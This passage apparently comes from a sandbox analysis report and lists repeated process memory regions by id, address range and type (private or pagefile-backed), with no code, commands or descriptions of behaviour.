monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3134 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3135 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3136 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3137 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3138 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3139 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3141 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3142 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3143 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3145 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3148 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3149 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3150 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3151 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3152 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3153 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3154 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3155 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3156 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3157 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3158 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3159 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3160 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3161 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3162 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3163 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3164 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3165 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3166 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3167 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3170 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3171 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3172 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3173 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3174 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3179 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3180 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3181 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3186 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3188 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3189 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3194 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3195 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3196 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3197 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3198 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3201 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3202 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3203 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3204 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3205 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3206 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3207 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3208 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3209 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3211 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3212 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3213 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3215 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3216 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3217 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3218 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3221 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3222 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3223 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3224 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3226 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3227 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3231 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3232 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3234 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3235 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3236 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3237 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3238 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3239 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3240 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3241 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3243 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3244 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3245 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3246 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3247 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3248 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3249 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3250 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3252 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3253 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3254 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3255 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3258 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3259 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3260 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3261 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3266 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3267 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3268 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3269 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3271 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3272 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3273 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3274 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3276 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3277 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3278 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3279 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3280 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3281 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3282 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3283 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3285 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3286 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3287 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3288 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3289 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3290 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3291 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3292 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3293 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3294 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3295 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3296 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3297 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3298 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3300 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3301 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3302 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3303 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3304 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3305 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3307 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3312 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3313 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3314 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3315 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3316 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3317 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3318 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3323 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3326 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3328 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3329 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3332 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3333 start_va = 0x580000 end_va = 0x580fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 3334 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 3335 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3336 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3338 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3339 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 3340 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3341 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3343 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3344 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 3345 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3346 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3349 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3350 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 3351 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3352 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3354 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3355 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 3356 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3357 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3358 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3359 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 3360 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3361 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3362 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3363 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 3364 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3365 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3369 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3370 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 3371 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3372 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3375 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3376 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 3377 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3378 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3382 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3383 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3384 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3385 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3388 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3389 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3390 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3391 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3394 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3395 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3396 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3397 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3403 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3404 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3405 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3406 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3407 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3408 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3409 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3410 